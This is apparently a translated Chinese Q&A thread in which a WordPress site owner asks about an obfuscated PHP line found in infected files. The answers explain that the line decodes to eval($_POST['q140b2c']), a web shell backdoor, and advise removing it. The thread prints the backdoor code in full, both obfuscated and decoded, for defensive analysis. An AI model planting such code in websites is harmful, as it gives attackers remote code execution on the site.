我有一个wordpress网站,我认为它被恶意软件感染了。我在我的文件中找到了这段PHP代码
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q140b2c'])){eval(${$s20}['q140b2c']);}
它做了什么?
答案 0 :(得分:0)
我在以前的网站hack中面临同样的问题。与上面相同的代码。他们将在PHP标记启动之前将代码放在.php文件中。
因此它将执行PHP站点。
解决下载所有代码&在文件和文件中搜索去掉。然后你的网站工作正常。
答案 1 :(得分:0)
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
$s20
评估为_POST
if(isset(${$s20}['q140b2c'])){
eval(${$s20}['q140b2c']);
}
成为
isset($_POST['q140b2c'])
然后eval($_POST['q140b2c']);